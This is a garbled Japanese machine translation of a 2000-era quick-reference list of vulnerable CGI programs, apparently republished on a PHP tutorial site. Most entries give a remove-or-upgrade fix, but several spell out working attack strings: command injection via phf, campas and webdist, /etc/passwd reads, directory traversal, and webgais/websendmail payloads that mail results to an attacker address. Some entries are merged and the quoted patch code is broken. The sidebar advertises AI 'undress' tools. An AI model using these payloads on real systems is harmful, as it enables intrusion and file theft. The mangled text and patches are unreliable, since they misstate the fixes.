ホームページ php教程 php手册 CGI セキュリティ脆弱性情報クイックチェック v1.0 (ターン 1)

CGI セキュリティ脆弱性情報クイックチェック v1.0 (ターン 1)

Jun 21, 2016 am 09:12 AM
bin cgi quot

cgi|セキュリティ|セキュリティの脆弱性

◆ CGI セキュリティ脆弱性情報クイックチェック v1.0

Date: 2000-8-15

############################ # ###########################################
この記事は以下から引用しましたこれは貴重なものではありません。注意して集めれば、これよりも包括的で優れた情報が得られると思いますが、私はこれらの情報を入手することを望んでいません。しかし、私は完全な自由、完全な公開性、完全な共有を主張する小さな人間なので、その友人が彼を責めないことを願っています:)
# 任意のセキュリティ組織または個人が喜んでいます。この記事の長期的かつ継続的なメンテナンス、更新、変更を行うつもりはありませんので、私と相談することなく、ご自由に行ってください。ただし、その結果はインターネットに完全に公開される必要があります。 . プライベートな行為は歓迎されません
ようこそ
# ただし、この記事の転載は歓迎です。
# ご質問やご提案がございましたら、iwillsurewin@163.net までメールしてください。
# iwillsurewin 2000.7.28
###################### # #############################################
1 実行任意のコマンド:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
提案:
解決策: Apache Web サーバーを 1.1.1 以降にアップグレードするか、アップグレードします。 NCSA Web サーバーを最新バージョンに更新します

_______________________________________________________________

2
タイプ: 攻撃タイプ
名前: wguset.exe
リスクレベル: 中
説明: Web サーバーのオペレーティング システムとして NT を使用している場合、および wguest を使用している場合。 Web 実行可能ディレクトリに存在すると、侵入者はそれを使用して、ハードディスク上のユーザーが読み取り可能なすべてのファイルを読み取ることができます
推奨: wguset.exe を Web ディレクトリから移動または削除します
解決策: wguset を移動または削除しますWeb ディレクトリから .exe を実行します

_______________________________________________________________


3
タイプ: 攻撃タイプ
名前: rguset.exe
リスクレベル: 中
説明: Web サーバーのオペレーティング システムとして NT を使用している場合、および最適な場合。 exe が Web 実行可能ディレクトリに存在すると、侵入者はそれを使用して、USR_ ユーザーが読み取ることができるハード ディスク上のすべてのファイルを読み取ることができます。 推奨事項: rguset.exe を Web ディレクトリから移動または削除します。
解決策: Web ディレクトリから rguset.exe を移動または削除します


__________________________________________________________

4
タイプ: 攻撃
名前: perl.exe
リスクレベル: 低
説明: Perl.exe は cgi-bin 実行ディレクトリに存在します。これは重大な構成エラーです。ハッカーは、perl.exe の後に一連の命令を追加し、ブラウザを使用してサーバー上の任意のスクリプト プログラムを実行する可能性があります
提案: perl.exe を実行権限のある Web ディレクトリに配置するのは危険です
解決策: Web 上で perl を削除します


______________________________________________________________


5
タイプ: 攻撃タイプ
名前: shtml.exe
リスクレベル: 低
説明: フロントページを Web サーバーとして使用している場合、侵入者は IUSR_< を使用する可能性があります。 hostname> user と shtml.exe を使用してマシンに侵入し、望ましくないことを実行します。
推奨事項: Web ディレクトリから shtml.exe を削除します。移動または削除されました


__________________________________________________________________


6
タイプ: 攻撃タイプ
名前: wwwboard.pl
リスクレベル: 低
説明: wwwboard.pl プログラムは、攻撃者にサーバー上で D.O.S 攻撃を簡単に実行させる可能性があります
推奨事項:必要に応じてファイルを削除します
解決策: get_variables のサブルーチン内の次の段落:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/ ,$FORM{ 'フォローアップ'});
$num_followups = @followups = @followup_num;
$last_message = Pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$ FORM{'origname '}";
$origsubject = "$FORM{'origsubject'}"; }
次のように置き換えられました:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/ ,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = Pop(@followups);
$origdate = "$FORM{'origdate'}"; "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# 作成者: Samuel Sparling sparling@ Slip.net)
$fn= 0;
while ($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# WWWBoard を終了します爆弾パッチ
}

関連リンク: http://hgfr

_______________________________________________________________

7
タイプ: 攻撃タイプ
名前: Uploader.exe
リスクレベル: 中
説明: Web サーバーのオペレーティング システムとして NT を使用している場合、侵入者は、uploader.exe を使用して任意のファイルをアップロードすることができます
提案: Uploader.exe を Web ディレクトリから移動または削除します
解決策: Uploader.exe を Web ディレクトリから移動または削除します

_______________________________________________________________

8
タイプ: 攻撃タイプ
名前: bdir.htr
リスク レベル: 高
説明: Web サーバーのオペレーティング システムとして NT を使用し、Web 実行可能ディレクトリに bdir.htr が存在する場合、侵入者はこれを使用して、Web サーバー上に ODBC データベースを際限なく作成できます。サーバーにアクセスし、いくつかの実行可能ファイルを生成します。
提案: Web ディレクトリから bdir.htr を移動または削除します。
解決策: Web ディレクトリから bdir.htr を移動または削除します。

_____________________________________________________________________

9
タイプ: 攻撃
名前: Count.cgi
リスク レベル: 高
説明: /cgi-bin ディレクトリ内の Count.cgi プログラム (wwwcount2.3 バージョン) にはオーバーフロー エラーがあり、侵入者がログインせずにリモートから任意の命令を実行できるようになります。
推奨事項: 必要に応じてこのファイルを削除します。
解決策: wwwcount を 2.4 にアップグレードするか、上記

_____________________________________________________________________________________

10
タイプ: 攻撃タイプ
名前: test-cgi
リスクレベル: 高
説明: ファイル test-cgi は、侵入者がサーバー上の重要な情報を閲覧するために使用される可能性があります

推奨事項: 推奨されますcgi-bin ディレクトリ内の実行プログラムを確認し、アクセス許可を厳密に制御します
解決策: test-cgi ファイルを削除します

_____________________________________________________________________

11
タイプ: 攻撃タイプ
名前: nph-test -cgi
リスクレベル: 高
説明: ファイル nph-test-cgi は、侵入者がサーバー上の重要な情報を閲覧するために使用する可能性があります

推奨事項: cgi-bin ディレクトリ内の実行プログラムを確認し、アクセス許可を厳密に制御することをお勧めします
解決方法: ファイルを削除しますnph-test-cgi ファイル

_______________________________________________________________

12
タイプ: 攻撃
名前: php.cgi
リスクレベル: 低
説明: php.cgi プログラムにはバッファ オーバーフローの脆弱性を含む多くの脆弱性があり、あらゆるシステム ファイルが侵入者に読み取られる原因になります
推奨事項: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします。名前: ハンドラー
リスクレベル: 低
説明: IRIX 5.3、6.2、6.3、6.4 の /cgi-bin/handler プログラムにバッファ オーバーフロー エラーがあり、侵入者がサーバー上のプログラムをリモートで実行する可能性があります:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
提案: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします
解決策: ハンドラー ファイルを削除します

_______________________________________________________________


14
タイプ: 攻撃タイプ
名前: webgais
リスクレベル: 高
説明: /cgi-bin、ディレクトリ内の webgais は GAIS 検索ツールのインターフェイスであり、この不具合により、侵入者はプログラムのセキュリティ メカニズムをバイパスし、システム コマンドを実行できます:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (これを「exploit」行の実際の長さに置き換えます)
telnet target .machine.com 80

query=';mail+you@your.host提案: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします
解決方法: webgais ファイルを削除します

_______________________________________________________________

15
タイプ: 攻撃タイプ
名前: websendmail
リスクレベル: 高
説明: /cgin-bin ディレクトリ内の websendmail プログラムにより、侵入者はシステム コマンドを実行できます:

telnet ターゲット。machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (サーバーに渡される文字列の実際の長さに置き換える必要があります。この場合は xxx=90)
receiver =;mail+ your_address@somewhere.org&content=a
提案: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします
解決策: 上級ユーザー: websendmail スクリプト、特殊文字のフィルター
一般ユーザー: websendmail ファイルの削除

___________________________________________________________________________

16
タイプ: 攻撃
名前: webdist.cgi
リスクレベル: 高
説明: Irix6.2 および 6.3 プラットフォームの場合、/cgi-bin ディレクトリの webdist.cgi には脆弱性があり、侵入者がログインせずにシステム上の任意の命令を実行できるようになります:
http://host/cgi-bin/webdist。 cgi ?distloc=;cat%20/etc/passwd

提案: 不要なプログラムを避けるために、cgi-bin ディレクトリを確認することをお勧めします。 解決策: /var/www/cgi-bin/webdist.cgi ディレクトリの webdist を削除します。 .cgi

________________________________________________________________________

17
タイプ: 攻撃
名前: FAXsurvey
リスクレベル: 高
説明: Linux S.u.S.E の /cgi-bin ディレクトリにある FAXsurvey プログラムにより、侵入者はログインせずにサーバー上でコマンドを実行できます:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
提案: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします
解決策: /cgi-bin/faxsurvey file


_______________________________________________________________


18
タイプ: 攻撃タイプ
名前: htmlscript
リスクレベル: 中
説明: htmlscript2.99x 以前のバージョンがインストールされているサーバー、侵入を可能にするバグがありますサーバー上の任意のファイルを表示できます:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
推奨事項: 確認することをお勧めします。不要なプログラムを避けるために cgi-bin ディレクトリを削除します。 解決策: /cgi-bin/htmlscript スクリプト ファイルを削除するか、htmlscript を 3.0 以降にアップグレードします。 リスク レベル: 中
説明: Irix6.4 以前の Web サーバーでは、/cgi- bin/pfdisplay プログラムにより、侵入者がサーバー上のファイルを不正に閲覧できるようになります
推奨事項: 不必要なプログラムを回避するために、cgi-bin ディレクトリを監査することをお勧めします。プログラムは存在します
解決策: /cgi-bin/pfdisplay ファイルを削除するか、パッチを適用します
パッチは、sgigate.sgi.com (204.94.209.1) または ftp.sgi.com からダウンロードできます:
ファイル名: README.patch.3018
アルゴリズム #1 (sum -r): 37955 11 README.patch.3018
アルゴリズム#2 (合計): 15455 11 README.patch.3018
MD5 チェックサム: 1169EB51D75E0794C64C2C1FD6211B69

ファイル名: patchSG00030 18
アルゴリズム #1 (sum -r) : 01679 patchSG000301 8
アルゴリズム #2 (合計): 12876 2 patchSG0003018
MD5チェックサム: BD16A53A0AE693D6E9E276EE066BDBC8

ファイル名: patchSG0003018.idb
アルゴリズム #1 (合計 - r): 01339 2 patchSG0003018.idb
アルゴリズム #2 (合計): 251 2 patchSG00030 18.idb
MD5チェックサム: 1CB16E6A8C50BF17CD02A29C2E4D35EB

ファイル名: patchSG0003018.performer_tools_man
アルゴリズム #1 (合計 -r): 10201 8 patchSG0003018.performer _tools_man
アルゴリズム #2 (合計): 3144 8 patchSG0003018.performer_tools_man
MD5 チェックサム: B6B3D90FAB9B5A342397C3E5AF5A8 D29

ファイル名: patchSG0003018.performer_tools_sw
アルゴリズム #1 (sum -r) : 48474 18 patchSG0003018.performer_tools_sw
アルゴリズム #2 (合計): 28176 18 patchSG0003018.performer_tools_sw
MD 5 チェックサム: DF4E8ED8326A6A0B39F7B4D67E5FD71F
関連リンク: http:// www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
タイプ: 攻撃
名前: www-sql
リスクレベル: 中
説明: www-sql は /cgi-bin/ ディレクトリに存在し、保護されたファイルへの侵入と不正アクセスにつながります
提案: www-sql ファイルを削除するのが最善です
解決策: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS")
if(!s); {
puts("Content-type: text/plainrnrnPHP/FI が内部エラーを検出しました。実行した内容を sa@hogia.net に通知してください。n") ;
exit(1);
}
s = getenv(" PATH_TRANSLATED");
関連接続:

_______________________________________________________________


21
タイプ: 攻撃タイプ
名前: view-source
リスクレベル: 高
説明: cgi-bin ディレクトリ内の view-source プログラムはセキュリティを実行しません入力をチェックし、侵入者がサーバー上のあらゆるファイルを閲覧できるようにします。 推奨事項: 不要なプログラムを回避するために、cgi-bin ディレクトリを監査することをお勧めします。 解決策: cgi-bin ディレクトリ内のプログラムを削除または表示します
関連リンク: http: //www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

____________________________________________________________________________

22
タイプ: 攻撃タイプ
名前: Campas
リスクレベル: 高
説明: Campas プログラムにバグがありますcgi-bin ディレクトリ内: 侵入者がサーバー上の重要なファイルを自由に閲覧できるようにする:
telnet www.xxxx.net 80
200.xx.xx.xx を試行中...
venus.xxxx.net に接続
エスケープ文字'^]' です。
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
推奨事項:プログラムが存在する不要なエラーを避けるために、cgi-bin ディレクトリを確認することをお勧めします
解決策:cgi-bin ディレクトリを削除します/cgi-bin ディレクトリ内のプログラム
関連リンク: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_______________________________________________________________


23
タイプ: 攻撃タイプ
名前: aglimpse
リスクレベル: 高
説明: でcgi-bin ディレクトリの aglimpse プログラムにはバグがあり、侵入者がログインせずに任意の命令を実行できるようになります。 推奨事項: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします。 解決策: /cgi を削除します。 -bin ディレクトリ。aglimpse プログラム
関連リンク: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________________

24
タイプ: 攻撃タイプ
名前: AT-admin。 cgi
リスクレベル: 中
説明: Excite for Web Servers 1.1 の /cgi-bin/AT-admin.cgi プログラムにより、一般ユーザーがシステム全体を完全に制御できるようになります
推奨事項: cgi-bin ディレクトリを確認して、不要なプログラムを回避します。
解決策: /cgi-bin ディレクトリ内の AT-admin.cgi プログラムを削除します。
関連リンク: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


__________________________________________________________________________

25
タイプ: 攻撃タイプ
名前: フィンガー
リスクレベル: 中
説明: /cgi-bin にあるこのフィンガー プログラムは他のサーバーの情報を表示できますが、パラメータがローカル マシンに変更されると、ローカル マシン上のアカウント情報が公開されます:
/cgi-bin/finger?@localhost
提案: 不要なプログラムを避けるために cgi-bin ディレクトリを確認することをお勧めします
解決策: /cgi-bin 内の Finger プログラムを削除しますディレクトリ
関連リンク:


_____________________________________________________________________________




このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

binとは何のファイルですか? binとは何のファイルですか? Jan 23, 2024 pm 03:33 PM

binファイルとはコンピュータのファイル形式であり、「バイナリファイル」の略称です。 bin ファイルは、コンピュータ プログラムやデータの保存と転送に一般的に使用されます。ソフトウェア開発では、コンパイラはソース コードをバイナリ形式に変換し、実行可能な bin ファイルを生成します。これらの bin ファイルにはコンピューター プログラムのマシン コードが含まれており、コンピューター上で直接実行できます。バイナリ ファイルには低レベルの機械命令が含まれているため、一般にテキスト ファイルよりも効率的で高速です。

binのファイル形式は何ですか? binのファイル形式は何ですか? Feb 01, 2023 pm 02:26 PM

bin はバイナリ ファイル形式です。バイナリ ファイル、その使用はシステムまたはアプリケーションによって異なります。バイナリのファイル形式の略語で、サフィックス「.bin」が付いたファイルは、単にバイナリ形式であることを示します。たとえば、仮想光ディスクドライブ ファイルは通常、接尾辞として「 .bin」を使用しますが、すべての bin ファイルが仮想 CD-ROM ファイルであることを意味するわけではありません。一般的に言えば、それらはマシン コードとアセンブリ言語でコンパイルされた結果です。

修正: NVIDIA / ゲーム - Adob​​e 画面の左上隅に DC ウォーターマークがありません 修正: NVIDIA / ゲーム - Adob​​e 画面の左上隅に DC ウォーターマークがありません Apr 30, 2023 am 08:22 AM

最近、一部の NVIDIA Studio ドライバー ユーザーから、Adobe Premiere Pro アプリケーションで「NODC」ウォーターマークが表示される問題が報告されています。一部のユーザーは、「YESDC」のウォーターマークも表示されたと報告しました。でも、心配しないでください。これはすべて、NVIDIA コア ファイル内の bin ファイルが破損していることが原因です。そのため、エクスプローラーでファイルを見つけて破損したファイルを削除し、再起動するだけで問題が解決します。あるいは、デフォルトの NVIDIA3d 設定を復元することもできます。問題を迅速に解決するには、次の修正に従ってください。解決策 1 – NVIDIAbin ファイルを削除する 以下の手順に従ってシステムから削除します

mdkでbinファイルを生成する方法 mdkでbinファイルを生成する方法 Oct 10, 2023 am 09:56 AM

MDK を使用して bin ファイルを生成する方法には、プロジェクトの作成、アプリケーション コードの作成、出力パスと名前の設定、コンパイルとリンクなどの手順が含まれます。詳細な導入: 1. MDK ソフトウェアを開き、新しいプロジェクトを作成します。 「プロジェクト」メニューで「新規プロジェクト」を選択し、ターゲットデバイスのモデルとサプライヤーを選択します; 2. ポップアップダイアログボックスで、プロジェクトの保存パスと名前を選択し、「保存」をクリックします。ボタンなど

PHP および CGI ファイルのアップロードおよびダウンロード テクノロジ: ファイル管理機能の実装方法 PHP および CGI ファイルのアップロードおよびダウンロード テクノロジ: ファイル管理機能の実装方法 Jul 21, 2023 am 11:19 AM

PHP および CGI を使用したファイルのアップロードおよびダウンロード テクノロジ: ファイル管理機能の実装方法 はじめに: ファイルのアップロードおよびダウンロードは、最新の Web アプリケーションの一般的な機能の 1 つです。この記事では、PHP および CGI プログラミング言語を使用してファイルのアップロードおよびダウンロード機能を実装する方法を紹介し、アップロードおよびダウンロードされたファイルを管理する方法を示すコード例をいくつか示します。 PHP を使用してファイル アップロードを実装するファイル アップロードの基本概念 ファイル アップロードを実装する CGI PHP を使用してファイル ダウンロードを実装するファイル ダウンロードの基本概念 ファイルでの CGI 実装

PHPとCGIを使ってユーザー登録・ログイン機能を実装する方法 PHPとCGIを使ってユーザー登録・ログイン機能を実装する方法 Jul 21, 2023 pm 02:31 PM

PHP と CGI を使用してユーザー登録とログイン機能を実装する方法 ユーザー登録とログインは、多くの Web サイトで必要な機能の 1 つです。今回は、PHPとCGIを使ってこの2つの機能を実現する方法を紹介します。コード例を使用してプロセス全体を示します。 1. ユーザー登録機能の実装 ユーザー登録機能では、新規ユーザーがアカウントを作成し、その情報をデータベースに保存することができます。以下は、ユーザー登録機能を実装するコード例です。 データベース テーブルの作成 まず、ユーザー情報を保存するデータベース テーブルを作成する必要があります。できる

php提交表单通过后,弹出的对话框怎样在当前页弹出,该如何解决 php提交表单通过后,弹出的对话框怎样在当前页弹出,该如何解决 Jun 13, 2016 am 10:23 AM

php提交表单通过后,弹出的对话框怎样在当前页弹出php提交表单通过后,弹出的对话框怎样在当前页弹出而不是在空白页弹出?想实现这样的效果:而不是空白页弹出:------解决方案--------------------如果你的验证用PHP在后端,那么就用Ajax;仅供参考:HTML code

PHP CLI と CGI の動作原理、類似点、相違点を探ります。 PHP CLI と CGI の動作原理、類似点、相違点を探ります。 Mar 11, 2024 pm 12:39 PM

動作原理と類似点と相違点 Web 開発では、PHP はさまざまな方法で Web サーバーと対話できる一般的に使用されるプログラミング言語であり、最も一般的な方法は PHPCLI (CommandLineInterface) および PHPCGI (CommonGatewayInterface) を使用することです。この記事では、PHPCLI と CGI の動作原理、類似点、相違点について説明し、それらの相違点を示す具体的なコード例を示します。 1.PHP

See all articles